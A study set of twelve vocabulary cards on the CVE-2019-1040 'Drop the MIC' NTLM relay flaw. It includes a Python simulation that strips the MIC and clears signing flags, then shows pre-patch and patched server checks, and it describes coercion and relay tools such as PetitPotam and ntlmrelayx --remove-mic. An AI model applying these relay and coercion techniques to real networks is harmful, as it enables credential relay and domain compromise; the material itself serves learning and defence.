CVE-2019-1040 (Drop the MIC) and NTLM Authentication

Description and Tags

Vocabulary terms and definitions related to the CVE-2019-1040 'Drop the MIC' vulnerability and NTLM relay attack mechanisms.

Last updated 12:34 AM on 5/22/26
12 Terms

1. MIC (Message Integrity Code)

A 16-byte HMAC_MD5 field in the NTLM AUTHENTICATE message, keyed with the session key, that covers the NEGOTIATE, CHALLENGE and AUTHENTICATE messages. A relaying man-in-the-middle can still forward the three messages unchanged, but cannot alter them in transit (for example, clear the signing flags) without invalidating the MIC.

2. MIC Computation Formula

$\text{MIC} = \text{HMAC\_MD5}(\text{ExportedSessionKey},\ \text{NEGOTIATE} \,\|\, \text{CHALLENGE} \,\|\, \text{AUTHENTICATE})$

The AUTHENTICATE message is hashed with its own MIC field set to 16 zero bytes. Without NTLMSSP_NEGOTIATE_KEY_EXCH, ExportedSessionKey is the SessionBaseKey, which for NTLMv2 is HMAC_MD5(NTOWFv2, NTProofStr); with key exchange it is the client-chosen random key carried in EncryptedRandomSessionKey. Either way the relay, which never learns the user's NT hash, cannot compute it.

3. CVE-2019-1040

Also known as "Drop the MIC" (reported by Preempt, patched June 2019). An NTLM tampering vulnerability: a Windows server accepted an AUTHENTICATE message from which a man-in-the-middle had removed the MIC, without checking whether the client had indicated that a MIC was present. With the MIC gone, the relayed messages can be modified freely, in particular the signing flags.

4. MsvAvFlags

An AV pair (AvId 0x0006) inside the NTLMv2 response; bit 0x2 tells the server that the client included a MIC. Because the AV pairs are covered by NTProofStr, a relaying attacker cannot clear this bit without knowing the user's hash. The CVE-2019-1040 flaw was that the unpatched server never compared the bit with the message it received; after the patch, an AUTHENTICATE message whose MsvAvFlags says "MIC present" but which carries no MIC is rejected.

5. CVE-2019-1040 Flaw 1

The MIC could simply be removed. The field is optional (its presence is inferred from the payload offsets in the AUTHENTICATE message), and the unpatched server did not check the "MIC present" bit in MsvAvFlags, so a message with the MIC cut out was accepted as if no MIC had ever been sent.

6. CVE-2019-1040 Flaw 2

With the MIC gone, nothing protects the negotiate flags, so the relay can clear NTLMSSP_NEGOTIATE_SIGN and NTLMSSP_NEGOTIATE_ALWAYS_SIGN even though the original client asked for signing. This is what makes SMB-to-LDAP relays work: the LDAP server would otherwise require signed traffic on a session whose NTLM negotiation requested signing, and the attacker, lacking the session key, cannot sign.
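The following is an added example, not code from this page, from Preempt or from impacket. It models cards 2, 4, 5 and 6 end to end in Python: NTOWFv2, the NTLMv2 response with its AV pairs, the MIC over the three messages, a relay that drops the MIC and clears the signing flags, and the target server's check in both pre-patch and patched form. The NT hash, challenges, timestamp and the simplified message encodings are constructed test data; a real SMB or LDAP server would have the DC verify the response over Netlogon instead of holding the hash itself.

```python
"""Toy NTLMv2 + MIC model of CVE-2019-1040. Added example, not code from the page or impacket.
All keys and challenges are constructed test data; the server is assumed to hold the NT hash."""
import hashlib
import hmac
import struct

NEG_SIGN, NEG_ALWAYS_SIGN, NEG_VERSION = 0x00000010, 0x00008000, 0x02000000
MSV_AV_EOL, MSV_AV_FLAGS, AV_FLAG_MIC_PRESENT = 0x0000, 0x0006, 0x00000002
SIG = b"NTLMSSP\x00"
FLAGS = NEG_SIGN | NEG_ALWAYS_SIGN | NEG_VERSION              # what the coerced client asks for
NT_HASH = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")   # constructed, not a real secret
USER, DOMAIN = "alice", "CORP"
SERVER_CHALLENGE, CLIENT_CHALLENGE = bytes(range(8)), bytes(range(8, 16))
TIMESTAMP = struct.pack("<Q", 132_000_000_000_000_000)          # arbitrary FILETIME
# Type 1 with empty Domain/Workstation fields, and Type 2 with empty TargetName and a
# TargetInfo payload (just MsvAvEOL) at offset 48; simplified but offset-consistent.
NEGOTIATE = SIG + struct.pack("<II", 1, FLAGS) + struct.pack("<HHI", 0, 0, 32) * 2
CHALLENGE = (SIG + struct.pack("<I", 2) + struct.pack("<HHI", 0, 0, 48) + struct.pack("<I", FLAGS)
             + SERVER_CHALLENGE + b"\x00" * 8 + struct.pack("<HHI", 4, 4, 48) + struct.pack("<HH", 0, 0))

def hmac_md5(key, data):
    return hmac.new(key, data, hashlib.md5).digest()

def ntowfv2(nt_hash, user, domain):
    # MS-NLMP 3.3.2: HMAC_MD5(NT hash, UNICODE(UPPERCASE(user) + domain))
    return hmac_md5(nt_hash, (user.upper() + domain).encode("utf-16-le"))

def encode_av_pairs(pairs):
    body = b"".join(struct.pack("<HH", av_id, len(v)) + v for av_id, v in pairs)
    return body + struct.pack("<HH", MSV_AV_EOL, 0)

def parse_av_pairs(blob):
    pairs, pos = {}, 0
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        if av_id == MSV_AV_EOL:
            return pairs
        pairs[av_id] = blob[pos + 4:pos + 4 + av_len]
        pos += 4 + av_len

def ntlmv2_response(resp_key, server_chal, client_chal, timestamp, av_blob):
    # temp = RespType, HiRespType, reserved, timestamp, client challenge, reserved, AV pairs, reserved
    temp = b"\x01\x01" + b"\x00" * 6 + timestamp + client_chal + b"\x00" * 4 + av_blob + b"\x00" * 4
    nt_proof = hmac_md5(resp_key, server_chal + temp)     # covers the AV pairs, so MsvAvFlags is protected
    return nt_proof + temp, hmac_md5(resp_key, nt_proof)  # (NtChallengeResponse, SessionBaseKey)

def build_authenticate(flags, nt_resp, user, domain, mic=b"\x00" * 16):
    # Type 3 (MS-NLMP 2.2.1.3) with Version and MIC present, so the fixed part is 88 bytes;
    # field order is Lm, Nt, Domain, User, Workstation, EncryptedRandomSessionKey
    payload, fields = b"", []
    for data in (b"\x00" * 24, nt_resp, domain.encode("utf-16-le"), user.encode("utf-16-le"), b"", b""):
        fields.append(struct.pack("<HHI", len(data), len(data), 88 + len(payload)))
        payload += data
    return SIG + struct.pack("<I", 3) + b"".join(fields) + struct.pack("<I", flags) + b"\x00" * 8 + mic + payload

def compute_mic(exported_session_key, negotiate, challenge, authenticate):
    # MIC = HMAC_MD5(ExportedSessionKey, NEGOTIATE || CHALLENGE || AUTHENTICATE) with the MIC field zeroed
    zeroed = authenticate[:72] + b"\x00" * 16 + authenticate[88:]
    return hmac_md5(exported_session_key, negotiate + challenge + zeroed)

def client_authenticate(negotiate, challenge):
    # Honest client: sets MsvAvFlags bit 0x2 inside the signed AV pairs, then fills in a real MIC
    avs = encode_av_pairs([(MSV_AV_FLAGS, struct.pack("<I", AV_FLAG_MIC_PRESENT))])
    nt_resp, key = ntlmv2_response(ntowfv2(NT_HASH, USER, DOMAIN), SERVER_CHALLENGE, CLIENT_CHALLENGE, TIMESTAMP, avs)
    auth = build_authenticate(FLAGS, nt_resp, USER, DOMAIN)
    return auth[:72] + compute_mic(key, negotiate, challenge, auth) + auth[88:]

def drop_mic(authenticate, clear=NEG_SIGN | NEG_ALWAYS_SIGN | NEG_VERSION):
    # Relay-side tampering in the style of ntlmrelayx --remove-mic: cut Version+MIC (bytes 64..88),
    # pull the six payload offsets up by 24 and clear the signing/version flags
    fields = b"".join(struct.pack("<HHI", ln, mx, off - 24)
                      for ln, mx, off in struct.iter_unpack("<HHI", authenticate[12:60]))
    flags = struct.unpack_from("<I", authenticate, 60)[0] & ~clear
    return authenticate[:12] + fields + struct.pack("<I", flags) + authenticate[88:]

def server_verify(negotiate, challenge, authenticate, enforce_mic_flag):
    # Target server; enforce_mic_flag=False is the pre-patch (vulnerable) behaviour
    ln, _, off = struct.unpack_from("<HHI", authenticate, 20)
    nt_proof, temp = authenticate[off:off + 16], authenticate[off + 16:off + ln]
    flags = struct.unpack_from("<I", authenticate, 60)[0]
    resp_key = ntowfv2(NT_HASH, USER, DOMAIN)
    if not hmac.compare_digest(nt_proof, hmac_md5(resp_key, SERVER_CHALLENGE + temp)):
        return "rejected: bad NTProofStr"
    client_says_mic = struct.unpack("<I", parse_av_pairs(temp[28:])[MSV_AV_FLAGS])[0] & AV_FLAG_MIC_PRESENT
    if min(o for _, _, o in struct.iter_unpack("<HHI", authenticate[12:60])) >= 88:   # MIC field present
        expected = compute_mic(hmac_md5(resp_key, nt_proof), negotiate, challenge, authenticate)
        if not hmac.compare_digest(authenticate[72:88], expected):
            return "rejected: bad MIC"
    elif enforce_mic_flag and client_says_mic:
        return "rejected: MsvAvFlags says MIC present but none sent"   # the June 2019 fix
    return "accepted, " + ("signing" if flags & (NEG_SIGN | NEG_ALWAYS_SIGN) else "no signing")

def demo():
    honest = client_authenticate(NEGOTIATE, CHALLENGE)
    flag_flipped = honest[:60] + struct.pack("<I", FLAGS & ~NEG_SIGN) + honest[64:]   # MIC left intact
    stripped = drop_mic(honest)
    return {"honest": server_verify(NEGOTIATE, CHALLENGE, honest, True),
            "flip_sign_flag_keep_mic": server_verify(NEGOTIATE, CHALLENGE, flag_flipped, True),
            "drop_mic_unpatched": server_verify(NEGOTIATE, CHALLENGE, stripped, False),
            "drop_mic_patched": server_verify(NEGOTIATE, CHALLENGE, stripped, True)}
```

demo() walks the four cases a practitioner cares about: the untouched message is accepted with signing; flipping the SIGN flag while leaving the MIC in place is caught by the MIC check; dropping the MIC and the flags together gets past the pre-patch server with no signing negotiated (the CVE); and the patched server refuses the same message because the NTProofStr-protected MsvAvFlags still says a MIC should be there.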

7. EPA (Extended Protection for Authentication)

Channel binding for NTLM over TLS: the client places a hash of the TLS server certificate in the MsvAvChannelBindings AV pair, which is covered by NTProofStr. A relay that terminates its own TLS session to LDAPS or HTTPS cannot produce a matching value, so with EPA enforced on the target the CVE-2019-1040 relay fails even if that target is unpatched. EPA does not protect cleartext services such as SMB or plain LDAP.

8. coerce_plus

A NetExec module (-M coerce_plus) that, given valid domain credentials, makes a target machine authenticate to an attacker-chosen listener. It implements several coercion RPC methods, including PetitPotam (MS-EFSRPC), PrinterBug (MS-RPRN) and DFSCoerce (MS-DFSNM), so it can stand in for the standalone PetitPotam.py script.

9. dnstool.py

A tool from the krbrelayx project that adds, modifies or removes records in AD-integrated DNS over LDAP using ordinary domain credentials. In a relay chain it gives the attacker's listener a hostname in the domain's DNS zone, so coerced clients can be pointed at a name instead of a bare IP address, which some coercion paths require before they will send credentials.

10. PetitPotam.py

A tool that coerces NTLM authentication from a target (typically a domain controller or other server) to a specified listener by calling the MS-EFSRPC interface (for example EfsRpcOpenFileRaw) with a UNC path pointing at the listener; the target's machine account then authenticates to the attacker, who relays it.

11. --remove-mic

An impacket ntlmrelayx.py option that exploits CVE-2019-1040: the relay cuts the MIC (together with the Version field) out of the AUTHENTICATE message and clears the signing flags before forwarding it. It is used when the coerced client negotiated signing, as SMB clients do, and the relay target would otherwise enforce it; the typical target is LDAP or LDAPS. It does not defeat a target that actually requires SMB signing, because the relay still has no session key to sign with.

12. AUTHENTICATE message

The third NTLM message (NEGOTIATE → CHALLENGE → AUTHENTICATE), sent by the client. It carries the NTLMv2 response (NTProofStr plus the AV pairs, including MsvAvFlags) and, when present, the 16-byte MIC at offset 72, right after the negotiate flags and the Version field.